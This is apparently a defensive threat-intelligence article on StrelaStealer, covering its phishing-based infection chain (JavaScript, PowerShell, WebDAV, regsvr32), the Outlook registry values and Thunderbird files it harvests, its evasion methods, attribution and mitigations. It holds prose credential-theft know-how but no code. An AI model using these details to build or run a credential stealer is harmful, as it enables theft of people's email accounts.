In the ever-evolving landscape of cyber threats, a particularly insidious malware known as StrelaStealer has emerged, posing significant risks to organizations worldwide. This malicious software is specifically engineered to exfiltrate email credentials from widely used clients such as Microsoft Outlook and Mozilla Thunderbird, thereby granting attackers unauthorized access to sensitive communications and data.
Origins and Evolution
First identified in November 2022, StrelaStealer has undergone continuous development, enhancing its capabilities to evade detection and broaden its reach. Initially targeting Spanish-speaking users, the malware has expanded its scope, now affecting organizations across Europe and the United States. Countries such as Italy, Spain, Germany, and Ukraine have reported significant incidents, indicating a well-orchestrated campaign with specific targeting parameters.
Infection Mechanism
StrelaStealer employs a multi-stage infection process, primarily disseminated through large-scale phishing campaigns. These campaigns deliver ZIP archives containing obfuscated JavaScript files to unsuspecting recipients. Upon execution, the JavaScript initiates a complex attack chain:
1. Execution of JavaScript: The victim executes the JavaScript file, typically using the Windows Script Host (CScript or WScript).
2. PowerShell Command: The script spawns a PowerShell process that executes an encoded command to map a WebDAV network path.
3. DLL Payload Retrieval: Using Regsvr32, the malware remotely registers and executes a DLL payload hosted on the mapped WebDAV share.
This sophisticated delivery mechanism allows the malware to execute directly in memory, effectively bypassing many traditional detection methods.
Technical Analysis
Upon successful execution, StrelaStealer performs extensive system reconnaissance, collecting information about the host system, installed applications, country locale, and internet connectivity. The malware specifically targets email credentials by:
– Outlook: Accessing Windows Registry keys to retrieve ‘IMAP User,’ ‘IMAP Server,’ and ‘IMAP Password’ values. The ‘IMAP Password’ is decrypted using the Windows CryptUnprotectData function before exfiltration.
– Thunderbird: Searching the ‘%APPDATA%\Thunderbird\Profiles\’ directory for ‘logins.json’ (account and password) and ‘key4.db’ (password database) files, which are then exfiltrated to the attacker’s command and control (C2) server.
The stolen credentials and system information are transmitted over unencrypted HTTP connections, allowing attackers to gain unauthorized access to victims’ email accounts.
Evasion Techniques
StrelaStealer employs several sophisticated techniques to evade detection:
– Obfuscation: The malware implements multi-layer obfuscation and code-flow flattening to complicate analysis.
– Locale Verification: Before proceeding with data exfiltration, the malware verifies the system’s locale by checking the Windows registry key ‘Control Panel\International\Locale’ and comparing it against predefined values for targeted countries.
– Dynamic API Resolution: The malware uses dynamic API resolution to obscure its activities further.
These evasion techniques demonstrate the threat actor’s commitment to stealth and operational security.
Attribution and Threat Actor
Security researchers have attributed StrelaStealer to a threat actor group designated as HIVE-0145, active since late 2022. This group is believed to operate as a financially motivated initial access broker, potentially serving as the sole operator behind StrelaStealer deployments. The identification of the threat actor provides valuable context for understanding the malware’s objectives and operational patterns.
Mitigation Strategies
Given the sophisticated nature of StrelaStealer, organizations are advised to implement comprehensive security measures:
– Email Security: Deploy advanced email filtering solutions to detect and block phishing attempts.
– User Education: Conduct regular training sessions to educate employees about the risks of phishing and the importance of verifying email attachments.
– Endpoint Protection: Utilize endpoint detection and response (EDR) solutions to monitor and respond to suspicious activities.
– Regular Updates: Ensure that all software, especially email clients, are up-to-date with the latest security patches.
By adopting these strategies, organizations can enhance their resilience against StrelaStealer and similar threats.
Conclusion
StrelaStealer represents a significant advancement in malware sophistication, combining stealthy infection mechanisms with targeted credential theft. Its evolution and expansion underscore the persistent and evolving nature of cyber threats. Organizations must remain vigilant, continuously updating their security protocols and educating their workforce to mitigate the risks posed by such advanced malware campaigns.
